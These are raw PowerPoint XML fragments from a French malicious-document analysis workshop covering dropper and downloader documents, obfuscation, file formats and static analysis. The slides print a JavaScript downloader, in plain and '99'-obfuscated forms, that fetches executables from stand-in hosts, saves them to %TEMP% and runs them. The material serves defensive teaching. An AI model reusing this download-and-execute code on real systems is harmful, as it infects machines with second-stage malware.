            </a:r>
            <a:endParaRPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Fn contient le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>repertoire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> TEMP de l’utilisateur + « \ » + 107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5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retour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> HTTP 200  la variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>xa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> est ouverte et sauvegardée dans un fichier dont le nom est composé par la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>concatenation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Fn + i + .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Fn contient le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>repertoire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> TEMP de l’utilisateur + « \ » + 107</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Après le téléchargement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>l’exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> est exécuté avec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ws.Run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9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attaquants vont faire tout ce qu'ils peuvent pour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rendre le script plus difficile à analyser.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techniques qu'ils utilisent pour ce faire peuvent être classées en catégories faciles à résoudre.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Offusquer la</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> mise en forme du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attaquants font souvent tout leur possible pour obscurcir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obfuscate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leur code et cacher son véritable objectif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5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ajouter des lignes de code supplémentaires,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5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offusquer les données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0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substituer des noms de variables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8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Minification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> – obscurcir la lisibilité du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6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9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6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Code mort sans valeur fonctionnelle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91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2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n’est pas un exemple de code étranger – par cotre c’est un bon exemple de ta technique suivante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8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 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utiliser pour comprendre ce que fait réellement le code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6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2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Remplacer toutes les instances 99 avec une chaine vide = enlever toutes les 99 de la chaîne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7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5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4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61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13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Peler les couches d’offuscation une seule à la fois</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Reformater le code (indentation, line breaks,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Monitorer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du script ( laisser le script se de offusquer seul)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7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utiliser des documents comme leurre – 73% des attaques réussi utilisent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phishing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des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(facile, répétable et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kill-chain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c’est la phase de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(livraison)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Rarement armés avec une charge malveillante (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finale ( vaincre les protection périmétrique - AV, EDR,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des carriers ( porteur de signal en lexique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telco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porte-avion en lexique militaire) pour le second-stage infection.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Fonctionnellement : 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portent la charge active pour installer le second-stage en tant que script incorporé)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appellent des sites externes pour télécharger le second-stage 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6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04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Vecteur numéro 1 d’attaque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>MS Office très </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>répendu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> dan le mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>corporate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42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03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30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Macros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/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moyen d'attaque des documents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Office. VBA langage très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puissant.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Fonctionnalités – DDE (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Exchange )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l'exécution automatique de programmes à l'ouverture d'un document – powershell.exe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Vulnérabilités - nombreuses vulnérabilités qui permettent l’exploitation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1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de toute analyse est de récupérer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démarche logique systématique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répétable (« ana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lysis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d’assurer la protection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qu’on cherche – scripts VBA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71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19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Commandes externes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32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r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> malveillant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> incorporé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29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 formats :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OpenXML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le nouveau format ( Office 2007)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 Format – ancien format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Doivent être analysés différemment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Fonctionnellement : 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portent la charge active pour installer le second-stage en tant que script incorporé)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appellent des sites externes pour télécharger le second-stage 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65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Format binaire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Header : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>docfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>leetspeak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>File system dans un fichier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4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 multiplateforme pour écrire des signatures pour détecter à peu près n'importe quel type de schéma et le décrire de multiples façons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nombreux endroits sur Internet qui contiennent des répertoires de signatures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46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format des documents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sont en fait des archives zip contenant de nombreux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fichiers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vbaProject.bin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s’il contient des macros il sera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présent (format binaire)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31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Extension – bon indicateur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547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Permets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éxecution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> des macros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67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d’analyse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>sugérée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appellent des sites externes pour télécharger le second-stage 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9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vecteurs de compromission pour s'introduire dans le système.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Rarement armés avec une charge malveillante (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finale ( vaincre les protection périmétrique - AV, EDR,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des carriers ( porteur de signal en lexique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telco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porte-avion en lexique militaire) pour le second-stage infection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intégrés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 documents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tels que JavaScript sont généralement ceux qui permettent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compromission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MAldoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ANALYSIS WORKSHOP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450" y="5999148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Horea Moldovan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/>
              <a:t>illustrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> les techniques o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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travailler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> avec du malware reel.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impotant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>d’apliquer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scrupuleursement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mesurer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>d’isolation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742772"/>
            <a:ext cx="2800587" cy="28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/>
              <a:t>illustrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> les techniques o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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travailler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> avec du malware reel.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impotant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>d’apliquer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scrupuleursement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mesurer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>d’isolation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fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>La sécurité est extrêmement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>importante !</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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742772"/>
            <a:ext cx="2800587" cy="28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4110120"/>
            <a:ext cx="1495514" cy="14955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998605" y="3649054"/>
            <a:ext cx="1154814" cy="120882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4110120"/>
            <a:ext cx="1495514" cy="14955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998605" y="3649054"/>
            <a:ext cx="1154814" cy="120882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64679" y="1841326"/>
            <a:ext cx="13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DROPPER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56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4110120"/>
            <a:ext cx="1495514" cy="14955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998605" y="3649054"/>
            <a:ext cx="1154814" cy="120882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64679" y="1841326"/>
            <a:ext cx="13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DROPPER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31427" y="5430496"/>
            <a:ext cx="19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DOWNLOADER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047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51" y="4486542"/>
            <a:ext cx="1495514" cy="1495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4713719" y="3799212"/>
            <a:ext cx="3279574" cy="2136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185775" y="3970751"/>
            <a:ext cx="2059761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4222533"/>
            <a:ext cx="1476809" cy="14768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6214328" y="2929803"/>
            <a:ext cx="1328" cy="1040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185775" y="3970751"/>
            <a:ext cx="2059761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4222533"/>
            <a:ext cx="1476809" cy="14768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6214328" y="2929803"/>
            <a:ext cx="1328" cy="1040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7647" y="569934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EXPLOIT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94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185775" y="3970751"/>
            <a:ext cx="2059761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utiliSes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> les scripts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4222533"/>
            <a:ext cx="1476809" cy="14768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6214328" y="2929803"/>
            <a:ext cx="1328" cy="1040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7647" y="569934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EXPLOIT</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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93293" y="5699342"/>
            <a:ext cx="13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MALWARE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120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Démarche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d’analyse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statique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documents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chaînes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caractères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(strings)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obfusqués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(XOR)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patterns (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exiftool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49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Malicieux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84" y="1815383"/>
            <a:ext cx="2333032" cy="233303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8" y="1815383"/>
            <a:ext cx="2453753" cy="2453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79" y="1727178"/>
            <a:ext cx="2421237" cy="24212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92205" y="5311036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DOCUMENTS</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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00465" y="5311036"/>
            <a:ext cx="2387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PIECE JOINTE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-F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56201" y="5264869"/>
            <a:ext cx="193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PAGES WEB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4102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URLs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URLs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Commandes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externes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8627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URLs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Commandes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>externes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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>powershell.exe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4429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Commandes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>externes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powershell.exe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3.	Nom des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fichiers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malicieux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422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2512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468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116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2049864" y="1716961"/>
            <a:ext cx="3949002" cy="363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077307" y="1716961"/>
            <a:ext cx="785717" cy="4132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5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2110154" y="2311121"/>
            <a:ext cx="4160017" cy="30145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4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Badpdf.pdf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Strings : JavaScript (obj13.js)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: N/A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hit : Program de creation suspect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19806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ws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WScript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");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fn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ws.ExpandEnvironmentStrings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("%TEMP%")+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(92)+"107";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xo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("MSXML2.XMLHTTP"); var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WScript.CreateObject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ADODB.Stream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var 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 = 0; </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFC000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370655" y="2311121"/>
            <a:ext cx="3034602" cy="28135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var b = "bad.example2.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>badder.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>".split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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for (var i=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; i&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; i++) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000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939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rgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xo.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET","http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://"+b[i]+"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>counter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/?id="+i+"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rnd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=711791"+n, false);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xo.status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> == 200) {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xa.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xa.saveToFile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+".exe",2);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ws.Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(fn+i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+".exe",1,0);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3768132" y="3938954"/>
            <a:ext cx="582804" cy="31149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868993" y="1999622"/>
            <a:ext cx="1426866" cy="123594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878004" y="4250454"/>
            <a:ext cx="799315" cy="71343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if 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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xo.status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> == 200) {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xa.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();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xa.saveToFile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+".exe",2);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ws.Run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+".exe",1,0);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}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2240782" y="4783015"/>
            <a:ext cx="2994409" cy="6732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if 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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xo.status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> == 200) {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xa.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();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xa.saveToFile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+".exe",2);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ws.Run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+".exe",1,0);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}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1165609" y="2311121"/>
            <a:ext cx="8450664" cy="33159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0649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b = "bad.example2.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>badder.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>".split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(" 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ws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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");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fn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ws.ExpandEnvironmentStrings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("%TEMP%")+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xo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("MSXML2.XMLHTTP"); var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xa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0; 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(var i=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; i&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; i++) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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xo.open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GET","http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://"+b[i]+"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>counter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/?id="+i+"&amp;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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xo.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xo.status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> == 200) {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xa.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xa.saveToFile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+".exe",2);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>
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	 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ws.Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(fn+i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+".exe",1,0); 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}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02" y="276329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</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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2260879" y="5355771"/>
            <a:ext cx="2602523" cy="271306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623" y="1716961"/>
            <a:ext cx="101268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nasdh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="99";var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nasdj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="b99a99d99.99e99x99a99m99p99l99e99299.99c99o99m99 99b99a99d99d99e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99r99.99e99x99a99m99p99l99e99.99c99o99m99« .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>replace(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nasdh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,'').split(" ");var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NrkQD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=38105;var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nasdi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= 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("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WScript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ahu2=“3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”;var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
